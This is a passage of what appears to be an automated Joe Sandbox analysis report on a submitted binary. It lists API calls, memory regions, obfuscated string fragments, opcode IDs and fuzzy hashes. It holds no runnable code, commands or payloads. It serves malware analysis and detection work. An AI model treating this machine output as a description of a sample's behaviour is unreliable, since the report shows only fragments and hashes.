                                                                        • Instruction Fuzzy Hash: 7DD14AB6A483118BD715CB28CC82B77B796EBC5304F1A863DD8868B781DA749E06C791

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: efg`
                                                                        • API String ID: 0-115929991
                                                                        • Opcode ID: 8e9a141c995758e423592a2bce2567e09f403e56710a16d225f9e58d81ed7201
                                                                        • Instruction ID: 5a54ed307a8041ff1acd64caca3ba78d8cfcf2dc2000f7d33151448dd5a576c7
                                                                        • Opcode Fuzzy Hash: 8e9a141c995758e423592a2bce2567e09f403e56710a16d225f9e58d81ed7201
                                                                        • Instruction Fuzzy Hash: E4C10171D00215CBCB268F58DC92BFB73B4FF56364F194659EA42AB6D1E730A900CBA0
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(003DBA46,?,00000010,00000005,00000000,?,00000000,?,?,003B9158,?,?,003B19B4), ref: 003DDF9E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: efg`
                                                                        • API String ID: 2994545307-115929991
                                                                        • Opcode ID: 5853ec8d5a1bcdd38cd87bc0aefc50f085ea05dc5838e76060a40246627b56d0
                                                                        • Instruction ID: 2998be03ffd8a59a742b5ff58fe508f69fe223cc8e2a86821a42c4f9ed945b78
                                                                        • Opcode Fuzzy Hash: 5853ec8d5a1bcdd38cd87bc0aefc50f085ea05dc5838e76060a40246627b56d0
                                                                        • Instruction Fuzzy Hash: 8C510B76A043509BD733EB60DC82B9F7356EFD2314F194428E9496B242DF346E068797
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6a93d9e2457b05300cca8ca4f324236334f9893e381230125801567f20403c60
                                                                        • Instruction ID: bec9ba9dab56d366b8dbc6f2910dfdc6d1ce72fd224ca97445ecd1337567e0f1
                                                                        • Opcode Fuzzy Hash: 6a93d9e2457b05300cca8ca4f324236334f9893e381230125801567f20403c60
                                                                        • Instruction Fuzzy Hash: 948122726083958FD716DF69D89062FB7E1EF89310F098A3CE995DB291E670DC418782
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:

                                                                        Control-flow Graph (rendered graph not reproduced): basic blocks 3dded0-3ddf5a; the entry block 3dded0-3ddee3 branches to blocks that call 3db7e0 (3ddf3e-3ddf47) and 3db860 (3ddf49-3ddf52), to a self-looping block at 3ddf10-3ddf27, and on to the RtlReAllocateHeap call at 3ddf29-3ddf3c; all paths rejoin at 3ddf54-3ddf5a.
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,00000000,00000000,00000001,?,00000000,00000000,003AB5FE,00000000,00000001), ref: 003DDF36
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0

                                                                        Control-flow Graph (rendered graph not reproduced): basic blocks 3db7e0-3db85b; the entry block 3db7e0-3db7ff falls into a self-looping block at 3db800-3db83d, which exits to the RtlAllocateHeap call at 3db83f-3db85b.
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 003DB84E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        APIs
                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 003ACEC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeSecurity
                                                                        • String ID:
                                                                        • API String ID: 640775948-0
                                                                        APIs
                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 003ACE94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                                                                        • API String ID: 0-1787199350
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (L<#$4@'z$OQ~w$\]F]$i=nv$l=x$se>?$v9
                                                                        • API String ID: 0-1834586532
                                                                        • Opcode ID: a0d8754ab52c2aa98d144e61ca235c1f26284ed19c18b2216a92b52e7a1962ef
                                                                        • Instruction ID: 4b877d3b375c9c4b41cc0217443bedf1a52163eb3edda6e4ac021559e9c929a6
                                                                        • Opcode Fuzzy Hash: a0d8754ab52c2aa98d144e61ca235c1f26284ed19c18b2216a92b52e7a1962ef
                                                                        • Instruction Fuzzy Hash: A3B218F3A0C2049FE304AE2DEC8567ABBE9EF94720F16493DEAC5C7744E63558008796
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !}z$8o}$;O{$Co-o$d(2o$kbq=$gv
                                                                        • API String ID: 0-3022657688
                                                                        • Opcode ID: 2fc290378ef3f1da574b75cb0eab123209bd11855c77491ffa79840aa2affb95
                                                                        • Instruction ID: ca5ffb418383c960e2cb44f382102218f5bd77831235969f9032c5b8d060bdc9
                                                                        • Opcode Fuzzy Hash: 2fc290378ef3f1da574b75cb0eab123209bd11855c77491ffa79840aa2affb95
                                                                        • Instruction Fuzzy Hash: B8B2F6F360C2149FE304AE2DEC8567AFBE9EF94720F16492DEAC4C7744E63598018697
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 10U&$>{$@H?^$@{33$WOo_$ro$co
                                                                        • API String ID: 0-1003904059
                                                                        • Opcode ID: 52bb886706fbdccfd59eec0e902f113054dc92d6b9006e508ae45b4d0b9d0402
                                                                        • Instruction ID: 1f395e1e13c5fb4d907e28a6eb7047b13858b220f056d72c12bf34e6186fbe63
                                                                        • Opcode Fuzzy Hash: 52bb886706fbdccfd59eec0e902f113054dc92d6b9006e508ae45b4d0b9d0402
                                                                        • Instruction Fuzzy Hash: 88B206F350C2049FD304AE29EC8567AFBE5EF94720F168A3DEAC4C3744EA3598448697
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
                                                                        • API String ID: 0-3274379026
                                                                        • Opcode ID: 9c488c27973e81f21f6a81d3ffbcdf51cd79c66cd43b56d2ba2c73c5c8821326
                                                                        • Instruction ID: 2c518bb10b920eba2ff510355af06e02212a7f1276bc65b6951e48381c1244c9
                                                                        • Opcode Fuzzy Hash: 9c488c27973e81f21f6a81d3ffbcdf51cd79c66cd43b56d2ba2c73c5c8821326
                                                                        • Instruction Fuzzy Hash: A95167725183918BD321CF25C8902ABBBF2FFD2305F09995CE8C18B695EB748906C782
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,T:$2L:$@O:$bK:$bM:$zQ:
                                                                        • API String ID: 0-763860872
                                                                        • Opcode ID: 0f95e38ed45b4a06ef9d54a987b71fc361df7a9d3bd825f45ccf5f8bbe72a5e0
                                                                        • Instruction ID: 346493c8ed15c94b810cd421d5189d19c3a88d1db8287c51073f0fbac76015f0
                                                                        • Opcode Fuzzy Hash: 0f95e38ed45b4a06ef9d54a987b71fc361df7a9d3bd825f45ccf5f8bbe72a5e0
                                                                        • Instruction Fuzzy Hash: 16427735608341DFD715CF28D890B5ABBE5FF89359F08892CE9898B291D379D984CF82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;Fsg$M3O$OUN$ZI!m$Ty
                                                                        • API String ID: 0-3158150873
                                                                        • Opcode ID: 4d1b8aed285a0d8846887d7c0be9787472d5d87d60c8e862e292815703aa0df2
                                                                        • Instruction ID: c8c0c420451301ed75d49bcf8cc3d81d07cd74a7737c2b01d8aeefe56dad7931
                                                                        • Opcode Fuzzy Hash: 4d1b8aed285a0d8846887d7c0be9787472d5d87d60c8e862e292815703aa0df2
                                                                        • Instruction Fuzzy Hash: 37B209F360C6049FE3046E2DEC8567BBBE9EF94720F16893DE6C5C7344E93598418692
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )=+4$57$7514$84*6$N
                                                                        • API String ID: 0-4020838272
                                                                        • Opcode ID: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                                                        • Instruction ID: ab18970fc5f24924bb87dafdae60017821d93ca90765c3e2efa3d198e376b3fb
                                                                        • Opcode Fuzzy Hash: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                                                        • Instruction Fuzzy Hash: C971D26110C3C28BD316CB2A84A037BFFE1DFA7305F19499EE4D65B282D779890AC752
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: +2/?$=79$BBSH$GZE^
                                                                        • API String ID: 0-3392023846
                                                                        • Opcode ID: b987680c66a2679e5cf3341a779c1b9ed145f0f0c3b56f07e33c0fb6698343db
                                                                        • Instruction ID: cbac6976022771a24ff990fdbb6c10ff58a4a54578fc9dafd37529768272363f
                                                                        • Opcode Fuzzy Hash: b987680c66a2679e5cf3341a779c1b9ed145f0f0c3b56f07e33c0fb6698343db
                                                                        • Instruction Fuzzy Hash: 3E52D271504B818FC736CF39C890B66BBE1BF56314F188A6DD4E68BB92C735A806CB51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: H{D}$TgXy$_o]a$=>?
                                                                        • API String ID: 0-2004217480
                                                                        • Opcode ID: fa5d95c9aada6a85721004688f8cc91567fb9940276ad451cea5326e84941ae2
                                                                        • Instruction ID: eafbecf16b2d9065a8534ef49d58fea5ddd1156780fedc104fd1896d443d5e06
                                                                        • Opcode Fuzzy Hash: fa5d95c9aada6a85721004688f8cc91567fb9940276ad451cea5326e84941ae2
                                                                        • Instruction Fuzzy Hash: 1E1256B1210B41CFD3358F26D895B97BBF9FB45314F148A2DD5AA8BAA0CB74A405CF80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
